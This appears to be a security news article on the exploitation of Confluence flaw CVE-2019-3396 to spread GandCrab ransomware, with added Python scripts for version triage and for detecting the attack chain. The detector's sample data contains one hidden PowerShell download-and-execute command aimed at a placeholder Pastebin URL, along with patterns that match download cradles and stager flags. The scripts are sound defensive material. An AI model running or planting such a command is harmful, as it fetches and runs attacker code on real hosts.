The collaboration software Confluence, made by the Australian company Atlassian, is again on hackers' radar. Although Atlassian released patches for a set of critical vulnerabilities in its flagship product on March 20, 2019, it appears that attackers are still exploiting one of these bugs to infect the servers of thousands of companies worldwide with the widespread and devastating GandCrab ransomware. GandCrab appeared in January 2018 and is still offered by its creators on underground forums to other hacking groups in exchange for a share of the profits, a ransomware-as-a-service model. As there are still no free decryption keys for the latest GandCrab 5.2 version, this malware is a major threat to both consumers and businesses.
Confluence is a Java-based wiki-style application that gives coworkers in an enterprise a shared space in which to work on common projects and track tasks. The vulnerability in question, tracked as CVE-2019-3396, lies in Confluence's Widget Connector, a macro that lets users embed content from social media or other websites into wiki pages. The flaw is a server-side template injection: an attacker controls the "_template" parameter handed to the Widget Connector and points it at a template of their choosing, which yields unauthenticated remote code execution and, with it, complete control over the targeted host. According to Atlassian, all versions of Confluence Server and Confluence Data Center prior to 6.6.12, 6.12.3, 6.13.3, and 6.14.2 are affected.
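The fixed releases above are the first thing an administrator needs when checking an estate of Confluence instances. The following script is an added example, not code from the article or from Atlassian: it triages a constructed inventory of hostnames and version strings against those fix releases. It assumes that release lines without a fix of their own (6.7 through 6.11) must be upgraded and that lines newer than 6.14.2 (6.15 and later) shipped after the fix.

```python
"""Triage Confluence Server / Data Center versions against the
CVE-2019-3396 fix releases listed in Atlassian's advisory."""
import re
from typing import Dict, List, Tuple

Version = Tuple[int, int, int]

# Fixed releases from the advisory, keyed by their (major, minor) release line.
FIXED_RELEASES: Dict[Tuple[int, int], Version] = {
    (6, 6): (6, 6, 12),
    (6, 12): (6, 12, 3),
    (6, 13): (6, 13, 3),
    (6, 14): (6, 14, 2),
}
LATEST_FIX: Version = max(FIXED_RELEASES.values())  # 6.14.2


def parse_version(text: str) -> Version:
    """Turn '6.13.1' (or '6.13') into a comparable (major, minor, patch) tuple."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)(?:\.(\d+))?\s*", text)
    if not m:
        raise ValueError(f"unrecognised Confluence version: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_vulnerable(text: str) -> bool:
    """True if the version predates the fix for its release line.

    Release lines without a fix of their own (6.7 through 6.11) are treated
    as vulnerable unless they are newer than the latest fixed release, which
    only 6.15 and later are (assumption: those lines shipped after the fix).
    """
    v = parse_version(text)
    fixed = FIXED_RELEASES.get(v[:2])
    if fixed is not None:
        return v < fixed
    return v < LATEST_FIX


def triage(inventory: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (host, version) pairs that still need the patch, sorted by host."""
    return sorted((host, ver) for host, ver in inventory.items() if is_vulnerable(ver))


# Constructed inventory for illustration (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "wiki-prod": "6.13.1",
    "wiki-lts": "6.6.12",
    "wiki-legacy": "5.10.8",
    "wiki-staging": "6.9.0",
    "wiki-new": "6.15.1",
}

if __name__ == "__main__":
    for host, ver in triage(SAMPLE_INVENTORY):
        print(f"{host}: Confluence {ver} is affected by CVE-2019-3396, upgrade required")
```

The check is deliberately conservative: a version string that does not parse raises rather than being silently treated as safe, and anything on an unfixed release line older than 6.14.2 is reported.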
Public exploit code traced as the root cause of the Confluence attacks
Cybersecurity company Alert Logic has just released a report stating that proof-of-concept exploit code for CVE-2019-3396 was published on April 10, 2019, and that the first breached servers appeared about a week later. The first affected Confluence customer was injected with a malicious payload that forced the system to contact an IP address already well known in Alert Logic's database: it had previously been associated with attacks on another flaw, the Oracle WebLogic vulnerability CVE-2017-10271. This led the researchers to conclude that the attackers who control that IP address are also behind the Confluence exploitation.
The Alert Logic report gives a detailed view of the attack chain. After a Confluence server is compromised, the attackers deploy a payload that downloads and executes a PowerShell script on the target system. That script in turn fetches a specially tailored version of Empire, the open-source PowerShell post-exploitation agent, from a Pastebin page. The attackers then use the Empire agent to inject an executable into the memory of a running process. Further analysis shows that this executable, named len.exe, is the notorious GandCrab 5.2 ransomware.
The use of unauthenticated remote code execution to spread GandCrab initially puzzled the researchers, since ransomware is usually distributed through phishing emails carrying malicious Office attachments. Attackers who exploit vulnerabilities in server software typically deploy cryptomining malware instead, because a server's resources are better suited to mining. In the case of the Confluence vulnerability, however, the attackers have probably reasoned that the application holds valuable company data that may not be adequately backed up, so the potential proceeds of a ransomware attack are likely to exceed the profits from mining cryptocurrency on the infected hosts.
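The chain described above (the Java web application spawning a shell, a PowerShell download cradle pulling a stager from Pastebin, an Empire launcher) gives a defender three concrete indicators to hunt for in endpoint telemetry. The detection logic below is an added example, not code from Alert Logic's report or from the Empire project. It runs over a few constructed process-creation events and assumes that Confluence on Windows runs under java.exe or a Tomcat service image; the launcher flags it looks for (-nop, -w hidden, -enc) are the usual Empire stager pattern and are an assumption, not something the article states.

```python
"""Flag process-creation events matching the post-exploitation chain observed
on compromised Confluence servers: the Java web application spawning a shell,
a PowerShell download cradle fetching a stager from Pastebin, and Empire-style
launcher flags."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Assumption: Confluence on Windows runs inside one of these JVM/service images.
JVM_IMAGES = {"java.exe", "javaw.exe", "tomcat9.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Download cradles commonly used to fetch and run a remote script.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient",
    re.IGNORECASE,
)
PASTEBIN = re.compile(r"pastebin\.com", re.IGNORECASE)
# Typical Empire launcher flags (assumption based on the Empire project's
# default stagers, not something the article states).
STAGER_FLAGS = re.compile(
    r"-nop\b|-noni\b|-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> List[str]:
    """Return the names of the indicators an event matches (empty if benign)."""
    findings = []
    parent, image = basename(ev.parent_image), basename(ev.image)
    if parent in JVM_IMAGES and image in SHELL_IMAGES:
        findings.append("jvm_spawned_shell")
    if image in SHELL_IMAGES:
        if DOWNLOAD_CRADLE.search(ev.command_line) and PASTEBIN.search(ev.command_line):
            findings.append("pastebin_download_cradle")
        if STAGER_FLAGS.search(ev.command_line):
            findings.append("stager_launch_flags")
    return findings


def triage(events: List[ProcessEvent]) -> List[Tuple[str, str, List[str]]]:
    """(host, severity, findings) for every event with at least one indicator.
    A shell spawned by the JVM together with any other indicator is the full
    chain and rated high; a single indicator is rated medium."""
    out = []
    for ev in events:
        f = classify(ev)
        if not f:
            continue
        severity = "high" if "jvm_spawned_shell" in f and len(f) > 1 else "medium"
        out.append((ev.host, severity, f))
    return out


# Constructed sample telemetry (hosts, paths and the Pastebin path are made up).
SAMPLE_EVENTS = [
    ProcessEvent("WS-07", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command Get-Date"),
    ProcessEvent("CONF-01", r"C:\Program Files\Atlassian\Confluence\jre\bin\java.exe",
                 r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                 ".DownloadString('https://pastebin.com/raw/EXAMPLE')\""),
    ProcessEvent("CONF-02", r"C:\Program Files\Atlassian\Confluence\jre\bin\java.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("WS-07", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command Invoke-WebRequest http://intranet.example/report.csv -OutFile r.csv"),
]

if __name__ == "__main__":
    for host, severity, findings in triage(SAMPLE_EVENTS):
        print(f"{host}: {severity} ({', '.join(findings)})")
```

The JVM-spawns-shell indicator is the one worth alerting on by itself for a Confluence host, since the application has no legitimate reason to launch cmd.exe or PowerShell; the cradle and launcher patterns on their own are noisier and are best used to raise the severity of that first signal rather than as standalone alerts.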